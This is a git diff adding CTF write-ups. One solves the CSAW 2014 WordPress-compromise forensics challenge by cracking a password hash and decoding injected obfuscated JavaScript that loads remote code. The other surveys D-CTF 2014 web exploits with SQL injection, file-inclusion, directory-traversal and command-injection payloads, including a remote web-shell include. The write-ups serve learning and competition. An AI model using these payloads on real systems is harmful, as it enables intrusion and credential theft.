------------------------------------------------------ + +-- Dumping data for table `wp_comments` +-- +(..) + +(4,5,'Hacker','hacker@secretspace.com','','192.168.127.130','2014-09-16 14:21:26','2014-09-16 14:21:26','I HATE BUNNIES AND IM GOING TO HACK THIS SITE BWHAHAHAHAHAHAHAHAHAHAHAH!!!!!!! BUNNIES SUX',0,'1','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','',0,0), + +(7,5,'Bald Bunny','nohair@hairlessclub.com','','192.168.127.130','2014-09-16 20:47:18','2014-09-16 20:47:18','I find this blog EXTREMELY OFFENSIVE!',0,'1','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','',0,0), + +(8,5,'MASTER OF DISASTER','shh@nottellin.com','','192.168.127.137','2014-09-17 19:40:57','2014-09-17 19:40:57','Shut up baldy',0,'1','Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko','',7,0); +(...) +``` + + +Searching for the host **secretspace.com** leads to some generic website. Inspecting its source code does not give us any hint either. Maybe its IP address? + +```sh +$ dig secretspace.com + +; <<>> DiG 9.9.4-P2-RedHat-9.9.4-15.P2.fc20 <<>> secretspace.com +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61131 +;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 + +;; QUESTION SECTION: +;secretspace.com. IN A + +;; ANSWER SECTION: +secretspace.com. 285 IN A 72.167.232.29 + +;; Query time: 7 msec +;; SERVER: 10.0.0.1#53(10.0.0.1) +;; WHEN: Thu Sep 25 15:51:26 EDT 2014 +;; MSG SIZE rcvd: 49 +``` + +The IP 72.167.232.29 leads to another generic page with no hints and with nothing in special in the source code. Wrong direction... + + +All right, let's give a last try and open the tables from the MySQL dump file inside a nice GUI. I use [phpMyAdmin], which I showed how to install and to configure in my tutorial about setting up a [LAMP server]. + +We open ```localhost/phpmyadmin``` in our browser. First, we go to *Databases* and then *Create Database* with any name we want. Then we *Import* ```mysql_backup.sql`` to this database. All the tables are loaded. Let's use the *Search* option to look for *key* or *flag*. + + +![cyber](http://i.imgur.com/tVOY1VJ.png) +![cyber](http://i.imgur.com/jY7CbLZ.png) + +Nope. Nothing in special. By the way, ```default_pingback_flag1`` is just a **Wordpress** flag indicating the default status of ping backs when new blog posts are published. + +Let's continue our search. If we look inside each of the tables we find: + +* The URL for the [blog], which doesn't render. However, in the source code, there is a commented link that leads to a [cute website]. Nothing else. + +* Oh, wait! We found a hashed password! +![cyber](http://i.imgur.com/FiQONze.png) + +--- +## Cracking the Password + +We want to crack ```$P$BmHbpWPZrjt.2V8T2xDJfbDrAJZ9So1``` and for this, we are going to use [hashcat]. If you are in [Kali] or in any Debian distribution you can install it with: +```sh +$ apt-get hashcat +``` + +In Fedora, we need to download and unzip it: +```sh +$ wget http://hashcat.net/files/hashcat-0.47.7z +$ 7za e hashcat-0.47.7z +``` + +Now, we are going to perform a brute force attack so we need a list of passwords. If you are using Kali, you can find them with: + +```sh +$ locate wordlist +``` +If not, this is an example for you (it's always good to have several lists!): +```sh +$ wget http://www.scovetta.com/download/500_passwords.txt +$ head 500_passwords.txt +123456 +password +12345678 +1234 +12345 +dragon +qwerty +696969 +mustang +``` + +Hashcat is awesome because it gives you a list of hash types: + +``` + 0 = MD5 + 10 = md5($pass.$salt) + 20 = md5($salt.$pass) + 30 = md5(unicode($pass).$salt) + 40 = md5(unicode($pass).$salt) + 50 = HMAC-MD5 (key = $pass) + 60 = HMAC-MD5 (key = $salt) + 100 = SHA1 + 110 = sha1($pass.$salt) + 120 = sha1($salt.$pass) + 130 = sha1(unicode($pass).$salt) + 140 = sha1($salt.unicode($pass)) + 150 = HMAC-SHA1 (key = $pass) + 160 = HMAC-SHA1 (key = $salt) + 200 = MySQL + 300 = MySQL4.1/MySQL5 + 400 = phpass, MD5(Wordpress), MD5(phpBB3) + 500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 + 800 = SHA-1(Django) + (...) +``` + +We choose 400 because we are dealing with Wordpress. We copy and paste the hash to a file *pass.hash*. Then, we run: +```sh +$ ./hashcat-cli64.bin -m 400 -a 0 -o cracked.txt --remove pass.hash word_list.txt + +Initializing hashcat v0.47 by atom with 8 threads and 32mb segment-size... +(...) + +``` +where: + + * -m is for --hash-type=NUM + * -a 0: Using a dictionary attack + * cracked.txt is the output file + * word_list.txt is our dictionary + + +Now let's take a peak in the output file: + +```sh +$ cat cracked.txt +$P$BmHbpWPZrjt.2V8T2xDJfbDrAJZ9So1:fluffybunnies +``` + +It worked! Our password is **fluffybunnies**! + +All right, this is a very silly password! It could be easily guessed. If you were the attacker, wouldn't you try this as the first option? OK, maybe right after *password* and *123456*... :) + + +#### What we have so far +All we have learned from the MySQL dump file was: + +* the attacker's motivation, + +* the blog's URL, + +* that the application was in Wordpress, + +* and a password. + +Ah, also that ```mailserver_login:login@example.com``` and ```mailserver_pass=password```. Talking about security... + +Let's move on. + +--- +## Inspecting /var/logs/apache2 + +The next item in the list is log inspection. We need wisely choose where to start because there are many of them: + +```sh +$ find . -type f -name '*.log' +./apache2/error.log +./apache2/access.log +./apache2/other_vhosts_access.log +./fontconfig.log +./boot.log +./gpu-manager.log +./mysql.log +./bootstrap.log +./pm-powersave.log +./kern.log +./mysql/error.log +./alternatives.log +./lightdm/x-0.log +./lightdm/lightdm.log +./casper.log +./auth.log +./apt/term.log +./apt/history.log +./dpkg.log +./Xorg.0.log +./upstart/container-detect.log +./upstart/console-setup.log +./upstart/mysql.log +./upstart/alsa-state.log +./upstart/network-manager.log +./upstart/whoopsie.log +./upstart/procps-virtual-filesystems.log +./upstart/cryptdisks.log +./upstart/systemd-logind.log +./upstart/procps-static-network-up.log +./upstart/alsa-restore.log +./upstart/modemmanager.log +``` + +We start with the Apache's log because they carry the connection information. If there is any important information in the log files, it should appear in the end, because the attack should be one of the last things that were logged. + + It turned out that [Tailing] the *apache* logs did not reveal anything useful. + +----- +## Inspecting var/logs/auth.log + + +Considering that the password **fluffybunnies** was very easy to guess, we are going to take a leap and suppose that this was how the attack was crafted. + +Tailing ```auth.log``` shows something interesting: + +```sh +Sep 17 19:18:53 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/bin/chmod -R 775 /var/www/ +Sep 17 19:20:09 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js +Sep 17 19:20:55 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/find /var/www/html/ * touch {} +``` +So someone logged as root: + + 1. downgraded the permissions of */var/www* (755 means read and execute access for everyone and also write access for the owner of the file), and + + 2. modified a JavaScript file (html5.js) in *vi*. + +--- +## Finding the JavaScript Exploit + + +It looks like an attack to me! Let's [diff] this JavaScript file with the original ([which we can just google]): + + +```sh +$ diff html5.js html5_normal.js +93,122d92 +< var g = "ti"; +< var c = "HTML Tags"; +< var f = ". li colgroup br src datalist script option ."; +< f = f.split(" "); +< c = ""; +< k = "/"; +< m = f[6]; +< for (var i = 0; i < f.length; i++) { +< c += f[i].length.toString(); +< } +< v = f[0]; +< x = "\'ht"; +< b = f[4]; +< f = 2541 * 6 - 35 + 46 + 12 - 15269; +< c += f.toString(); +< f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1; +< c += f.toString(); +< f = ""; +< c = c.split(""); +< var w = 0; +< u = "s"; +< for (var i = 0; i < c.length; i++) { +< if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) { +< f += String.fromCharCode(46); +< w++; +< } +< f += c[i]; +< } +< i = k + "anal"; +< document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\"); + +``` +Aha!!! So what is being written? + +In JavaScript, the function ```document.write()``` writes HTML expressions or JavaScript code to a document. However, we can debug it in the console if we want, changing it to ```console.log()``` (and changing any ```document``` word to ```console```). + +To run JavaScript in the console, you need to install [Node]. + +So we run and we get a URL: + + +```sh +$ node html5.js + +``` +---- + +## Analyzing the Second JavaScript Exploit + +Awesome, we see a script exploit! Let's get it! + +```sh +$ wget http://128.238.66.100/analytics.js +--2014-09-25 19:17:19-- http://128.238.66.100/analytics.js +Connecting to 128.238.66.100:80... connected. +HTTP request sent, awaiting response... 200 OK +Length: 16072 (16K) [application/javascript] +Saving to: ‘analytics.js’ + +100%[===============================================================================>] 16,072 --.-K/s in 0.008s + +2014-09-25 19:17:19 (2.02 MB/s) - ‘analytics.js’ saved [16072/16072] +``` + + +The file turns out to be large, and *grep* *flag* or *key* doesn't show any hit. No IP addresses or URL neither. + +OK, let's take a closer look. We open the file in a text editor and we find a weird hex-encoded variable that is completely unconnected from the rest: +``` +var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"]; +window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]); +``` + +We decode it using Python or a [online hex-decode] and we get another file: +```python +>>> print("\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E") +('http://128.238.66.100/announcement.pdf', '_self', 'open') +``` + +Opening the URL leads to this picture: +![cyber](http://i.imgur.com/CNEQhfG.png) + + +LOL. Funny, but no flag yet... + +It should be in the PDF somewhere! + +___ +## Finding the Second Hex-encoded String: Approach I + + +All right, let's use what we learned from the [CSAW CTF 2014 Forensic -Obscurity] problem. First, let's see if we find the flag with a simple grep: +```sh +$./pdf-parser.py announcement.pdf | grep flag +$./pdf-parser.py announcement.pdf | grep key +``` + +No luck. Let us ID the file to see if we find any funny stream: + +```sh +$ ./pdfid.py announcement.pdf PDFiD 0.1.2 announcement.pdf + PDF Header: %PDF-1.4 + obj 9 + endobj 9 + stream 4 + endstream 4 + xref 1 + trailer 1 + startxref 1 + /Page 1 + /Encrypt 0 + /ObjStm 0 + /JS 0 + /JavaScript 0 + /AA 0 + /OpenAction 0 + /AcroForm 0 + /JBIG2Decode 0 + /RichMedia 0 + /Launch 0 + /EmbeddedFile 1 + /XFA 0 + /Colors > 2^24 0 +``` + +Oh, cool, there is a **Embedded File**! Let's look closer to this object: +```sh +$ ./pdf-parser.py --stats announcement.pdf Comment: 3 +XREF: 1 +Trailer: 1 +StartXref: 1 +Indirect object: 9 + 2: 3, 7 + /Catalog 1: 6 + /EmbeddedFile 1: 8 + /Filespec 1: 9 + /Page 1: 5 + /Pages 1: 4 + /XObject 2: 1, 2 +``` + + Nice. So now we can decode our pdf file using the **object code**, which we can see above that is **8**: + +```sh +$ ./pdf-parser.py --object 8 --raw --filter announcement.pdf +obj 8 0 + Type: /EmbeddedFile + Referencing: + Contains stream + + << + /Length 212 + /Type /EmbeddedFile + /Filter /FlateDecode + /Params + << + /Size 495 + /Checksum <7f0104826bde58b80218635f639b50a9> + >> + /Subtype /application/pdf + >> + + var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0]; + +``` +Which *finally* leads to our flag! +```python +>>> print("\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D") +YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy} +``` + +--- +## Finding the Second Hex-encoded String: Approach II + +There is a nice tool called [qpdf] that can be very useful here: +```sh +$ sudp yum install qpdf +``` + +Now, we just do the following conversion: +```sh +$ qpdf --qdf announcement.pdf unpacked.pdf +``` + +Opening *unpacket.pdf* with [l3afpad] also leads to the flag : + +``` +stream +var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0]; +endstream +endobj +``` + + + + +[MySQL database dump file]:http://dev.mysql.com/doc/refman/5.0/en/mysqldump-sql-format.html +[CSAW CTF 2014 Forensic -Obscurity]: http://bt3gl.github.io/forensics-200-obscurity.html +[online hex-decode]: http://ddecode.com/hexdecoder/ +[which we can just google]: http://phpxref.ftwr.co.uk/wordpress/wp-content/themes/twentythirteen/js/html5.js.source.html +[Tailing]: http://en.wikipedia.org/wiki/Tail_(Unix) +[phpMyAdmin]: http://www.phpmyadmin.net/home_page/index.php +[qpdf]: http://qpdf.sourceforge.net/ +[l3afpad]: http://tarot.freeshell.org/leafpad/ +[diff]: http://linux.die.net/man/1/diff +[MySQL database dump file]: http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html +[Linux File System]: http://www.tldp.org/LDP/intro-linux/html/sect_03_01.html +[LAMP server]: https://coderwall.com/p/syyk0g?i=5&p=1&q=author%3Abt3gl&t%5B%5D=bt3gl +[CSAW2014-FluffyNoMore-v0.1.tar.bz2]: https://ctf.isis.poly.edu/static/uploads/649bdf6804782af35cb9086512ca5e0d/CSAW2014-FluffyNoMore-v0.1.tar.bz2 +[bzip2]: http://en.wikipedia.org/wiki/Bzip2 +[cute website]: http://ww17.blog.eyeheartfluffybunnies.com/?fp=Tnxj5vWdcChO2G66EhCHHqSAdskqgQmZEbVQIh1DCmrgCyQjbeNsPhkvCpIUcP19mwOmcCS1hIeFb9Aj3%2FP4fw%3D%3D&prvtof=RyfmkPY5YuWnUulUghSjPRX510XSb9C0HJ2xsUn%2Fd3Q%3D&poru=jcHIwHNMXYtWvhsucEK%2BtSMzUepfq46Tam%2BwGZBSFMjZiV2p3eqdw8zpPiLr76ixCoirz%2FR955vowRxEMBO%2FoQ%3D%3D&cifr=1&%22 +[blog]: http://ww17.blog.eyeheartfluffybunnies.com +[hashcat]: http://hashcat.net/hashcat/ +[file]: http://en.wikipedia.org/wiki/File_(command) +[Kali]: http://www.kali.org/ +[Node]: http://nodejs.org/ + diff --git a/CTFs_and_WarGames/2014/CSAW-quals/networking/README.md b/CTFs_and_WarGames/2014/CSAW-quals/networking/README.md index 94a479f..a9ca8e3 100644 --- a/CTFs_and_WarGames/2014/CSAW-quals/networking/README.md +++ b/CTFs_and_WarGames/2014/CSAW-quals/networking/README.md @@ -1,7 +1,6 @@ -#Networking-100: Big Data +# Networking-100: Big Data -This is the only networking problem, and it is only 100 points, so it turned out to be very easy. The problem starts with the following text: diff --git a/CTFs_and_WarGames/2014/CSAW-quals/reverse-engineering/eggshells-100/README.md b/CTFs_and_WarGames/2014/CSAW-quals/reverse-engineering/eggshells-100/README.md index 8b599aa..10a6d3e 100644 --- a/CTFs_and_WarGames/2014/CSAW-quals/reverse-engineering/eggshells-100/README.md +++ b/CTFs_and_WarGames/2014/CSAW-quals/reverse-engineering/eggshells-100/README.md @@ -126,9 +126,7 @@ while True: # flag{trust_is_risky} ``` -Yaaay! The flag is **trust_is_risky**! Easy! - -**Hack all the things!** + The flag is **trust_is_risky**! Easy! [uncompyle2]: https://github.com/gstarnberger/uncompyle diff --git a/CTFs_and_WarGames/2014/DefCamp/README.md b/CTFs_and_WarGames/2014/DefCamp/README.md new file mode 100644 index 0000000..d812446 --- /dev/null +++ b/CTFs_and_WarGames/2014/DefCamp/README.md @@ -0,0 +1,381 @@ +# Exploring D-CTF Quals 2014's Exploits + +## Vulnerabilities + + + +### Remote File Inclusion and Local File Inclusion Vulnerabilities + +In [Remote File Inclusion] (RFI) an attacker can load exploits to the server. An attacker can use RFI to run exploits in both server and client sides. PHP's [include()](http://php.net/manual/en/function.include.php) is extremely vulnerable to RFI attacks. + + +[Local File Inclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) (LFI) is similar to RFI but only files that are currently in the server can be included. This type of vulnerability is seemed in forms for file uploading (with improper sanitation). + +An example of RFI exploitation is the case where the form only accepts some type of extensions (such as JPG or PNG) but the verification is made in the client side. In this case, an attacker can tamper the HTTP requests to send shellcode (with PHP extension, for example). I've shown examples of this attack in the [Natas post]. There I've explained that the trick was to rename a PHP shell code to one of these safe extensions. + + +[Remote File Inclusion]: http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion + + + + +### TimThumb and LFI + +[TimThumb] is a PHP script for manipulating web images. It was recently [discontinued because of security issues]. + +With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image. All she needs to do is to have it in some online subdomain. TimThumb will store this image in a cache folder and generate an MD5 of the full path of the shell. The last step is to perform an LFI attack with the shell in this folder. Check this [example of LFI exploitation](http://kaoticcreations.blogspot.com/2011/12/lfi-tip-how-to-read-source-code-using.html). + + + +[TimThumb]: https://code.google.com/p/timthumb/ +[discontinued because of security issues]:http://www.binarymoon.co.uk/2014/09/timthumb-end-life/ + + + + + +### CMS Mini and RFI + + +[CMS Mini] is a file system to build simple websites. It has [several vulnerabilities] such as [CSRF], RFI, and [XSS]. + +[CSRF]: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) +[XSS]: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) + + +An example of RFI vulnerability in CMS Mini is explored using curl: + +```http +http:// +[target/IP]/cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd +``` + +For more examples of exploits, check [1337day] and [this exploit-db]. + +[1337day]: http://1337day.com/exploit/3256 +[several vulnerabilities]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2961 + +[this exploit-db]: http://www.exploit-db.com/exploits/28128/ +[CMS Mini]: http://www.mini-print.com/ + + + + + + + + + + + + + + + + +### ApPHP and Remote Code Execution + +[ApPHP](http://www.apphp.com/) is a blog script. It is known for having [several vulnerabilities], including [remote code execution] (RCE). An example of RCE exploit for ApPHP [can be seen here]. A good start is to check the PHP's [disable_function](http://php.net/manual/en/ini.core.php#ini.disable-functions) list for stuff to hacker the server. + +[several vulnerabilities]: http://www.exploit-db.com/exploits/33030/ +[remote code execution]: https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution + +[can be seen here]: http://www.exploit-db.com/exploits/33070/ + + + +In this CTF, the challenge was to find what was not in that list. For instance, it was possible to use [$_POST](http://php.net/manual/en/reserved.variables.post.php) and [$_COOKIE](http://php.net/manual/en/reserved.variables.cookies.php) to send strings to functions such as [scandir()](http://php.net/manual/en/function.scandir.php) and [get_file_contents()](http://php.net/manual/en/function.file-get-contents.php): + +```http +GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/ +Cookie: 0=include +``` + +In addition, with a writable directory we can drop a shell in the server (you can use script-kiddies scripts like [r57 shell.net](http://www.r57shell.net/), but in real life, keep in mind that they are super uber [backdoored](http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/#more-447)). + +```http +Post Request: 0=include/myfile.php +Cookie: 0=http://www.r57shell.net/shell/r57.txt +``` + + +### Gitlist and Remote Command Execution + +[Gitlist] is an application to browse GitHub repositories in a browser. The versions up to 5.0 are known for [allowing remote attackers to execute arbitrary commands via shell], a type of [command injection]. Exploits for this vulnerability can be seen at [hatriot], at [packet storm], at [1337day], and at [exploit-db]. + +In this CTF, the following command could be used to look for the flag: + +```http +http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60 +``` + + +[exploit-db]: http://www.exploit-db.com/exploits/33990/ +[1337day]: http://en.1337day.com/exploit/22391 +[packet storm]: http://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.html +[hatriot]: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ +[command injection]: http://cwe.mitre.org/data/definitions/77.html +[allowing remote attackers to execute arbitrary commands via shell]: http://www.websecuritywatch.com/arbitrary-command-execution-in-gitlist/ +[Gitlist]: http://gitlist.org/ + + +### LibreOffice's Socket Connections + +LibreOffice's has a binary [soffice.bin] that takes socket connections on the *port 2002* (in this CTF, in the VPN's localhost). + +For instance, the command [unoconv] can be used to convert a file to a LibreOffice supported format. The flag **-c** opens a connection by the client to connect to an LibreOffice instance. It also can be used by the listener to make LibreOffice listen. + +From the documentation, the default connection string is: + +```http +Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext" +``` + +Therefore, you can connect to the socket and convert some document (such as */flag.txt*) to a PDF for example: + +```sh +$ unoconv --connection 'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext' -f pdf /flag.txt +``` + +An example of a payload can be seen [here]. + + +[here]: https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400 +[unoconv]: http://linux.die.net/man/1/unoconv +[LibreOffice]: http://www.libreoffice.org/ +[soffice.bin]: http://www.processlibrary.com/en/directory/files/soffice/66728/ + +### ColdFusion and Local File Disclosure + +[ColdFusion] is an old web application development platform. It carries its own (interpreted) language, **CFM**, with a Java backend. + +CFM has scripting features like ASP and PHP, and syntax resembling HTML and JavaScript. ColdFusion scripts have **cfm** and **cfc** file extension. For instance, [Adobe ColdFusion 11] and [Railio 4.2], the two platform accepting CFM, were both released in the beginning of 2014. + +The problem is that CFM is [vulnerable to a variety of attacks], including [Local File Disclosure](https://www.owasp.org/index.php/Full_Path_Disclosure) (LFD) and SQL injection (SQLi). Adding this to the fact that ColdFusion scripts usually run on elevated privileged users, we have a very vulnerable platform. + +[Railio 4.2]: http://www.getrailo.org/ +[ColdFusion]: http://en.wikipedia.org/wiki/Adobe_ColdFusion +[Adobe ColdFusion 11]: http://www.adobe.com/products/coldfusion-family.html + + +#### SQL Injection (SQLi) + + +[SQL Injection](https://www.owasp.org/index.php/SQL_Injection) is a classic attack where one injects exploits in a [SQL query](http://technet.microsoft.com/en-us/library/bb264565(v=sql.90).aspx). Vulnerabilities of this type can be spotted in queries such as **index.php?id=1**. I showed some of these exploits in my [Natas post]. + +In this CTF, these were some of the exploits that could be used: + +* List everything in a database, where **0x3a** is the hexadecimal symbol for **:**: +```sql +UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email),3 FROM cms.users-- +``` + +* See the password file content: +```sql +UNION ALL SELECT 1,LOAD_FILE("/etc/passwd"),3-- +``` + +* Write files and create a PHP shell into **URL/shell.php**, we can use a parameter **x** to takes a parameter to be executed (based on [this]): + +``` +UNION ALL SELECT 1 "',3 INTO OUTFILE '/var/www/html/shell.php"-- +``` + +Notice the *trailing pair of hyphens* **--** which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed (it removes the trailing single-quote left over from the modified query). To learn more about how to mitigate SQLi, I recommend [OWASP's SQLi Prevention Cheat Sheet](https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet +) and [this nice guide for SQLi mitigation](http://owtf.github.io/boilerplate-templates/SQLinjection.html) by OWSAP OWTF. + + + +By the way, it's useful in general to know [HTML URL Encoding] to craft these URLs. + +[this]: https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400 +[HTML URL Encoding]: http://www.w3schools.com/tags/ref_urlencode.asp + + + + +### CesarFTP 0.99g and Buffer Overflow + +[CesarFTP 0.99g](http://www.softpedia.com/get/Internet/Servers/FTP-Servers/Cesar-FTP.shtml) is an easy-to-use FTP server. It is also known for having several vulnerabilities, including [buffer overflow](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961). + +For example, see this exploit for **Metasploit** from [exploit-db](http://www.exploit-db.com/exploits/16713/) (or [an older one here](http://www.exploit-db.com/exploits/1906/)). + + + +#### File Disclosure of Password Hashes + +This vulnerability provides a 30-second window in the Administration panel, which can e use to write a shellcode. The main idea is a [directory traversal] to the **password.proprieties** that can be used to login in the server. + +Ingredients of this attack are: + +* The target must have ColdFusion administrator available, which is by default mapped to ***CFIDE/administrator/enter.cfm***. If it gets [500], it should be switched to HTTPS. + +* At the ColdFusion administrator, verify the version, and then use these injections: + +``` +(Version 6): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en + +(Version 7): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en + +(Version 8): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en + +(All versions): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en +``` + +* Now a shell can be written to a file and added in **Schedule New Task**. See detailed instructions at [blackhatlib], at [infointox], at [gnucitizen], at [kaoticcreations], at [cyberguerilla], at [jumpespjump], and at [hexale]. + + +[jumpespjump]: http://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html +[kaoticcreations]: http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html +[cyberguerilla]: https://www.cyberguerrilla.org/blog/?p=18275 +[vulnerable to a variety of attacks]: http://www.intelligentexploit.com/view-details.html?id=12750 +[gnucitizen]: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ +[hexale]: http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html +[infointox]: http://www.infointox.net/?p=59 +[directory traversal]: https://www.owasp.org/index.php/Path_Traversal +[500]: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes +[blackhatlib]: http://www.blackhatlibrary.net/Coldfusion_hacking + +---- + + +## Useful Tools + + +### Vulnerability Scanners + +Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyzer, we can use [RIPS](http://rips-scanner.sourceforge.net/). + +In this CTF we had to scan for [Heartbleed](http://en.wikipedia.org/wiki/Heartbleed), and we used [this script](https://gist.githubusercontent.com/eelsivart/10174134/raw/5c4306a11fadeba9d9f9385cdda689754ca4d362/heartbleed.py). + +### Scapy + +[Scapy](http://packetlife.net/blog/2011/may/23/introduction-scapy/) is a Python lib for crafting packets. It can be useful for problems such as [port knocking](http://en.wikipedia.org/wiki/Port_knocking). For illustration, check this [example from PHD CTF 2011](http://eindbazen.net/2011/12/phd-ctf-quals-2011-%E2%80%93-port-knocking/) and this from [ASIS CTF 2014](http://blog.dul.ac/2014/05/ASISCTF14/). Check [this project](https://code.google.com/p/pypk/source/browse/branches/release-0.1.0/knocker.py?r=3) too. + + +### Steganography + +One of the questions had a reference to the [paranoia.jar] tool, which hides text in an image file using [128 bit AES](http://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encryption. + +To run the tool (after downloading it) just do: + +```sh +java -jar paranoia.jar +``` + +[paranoia.jar]: https://ccrma.stanford.edu/~eberdahl/Projects/Paranoia/ + +### HTTP/HTTPS Request Tampering + +Very useful for the RFI problems (but not limited to them): + +* [Tamper Data]: view and modify HTTP/HTTPS headers. +* [Burp]: a Java application to secure or penetrate web applications. + + +[Burp]: http://portswigger.net/burp/ +[Tamper Data]: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ + + +### Wireshark + +At some point I'm going to dedicate an entire post for [Wireshark](https://www.wireshark.org/), but for this CTF the important things to know were: + +* Look for POST requests: +``` +http.request.method == "POST" +``` +* Submit the found data (same username, nonce, and password) with the command: +``` +$ curl --data 'user=manager&nonce=7413734ab666ce02cf27c9862c96a8e7&pass=3ecd6317a873b18e7dde351ac094ee3b' HOST +``` + + +### [Exif] 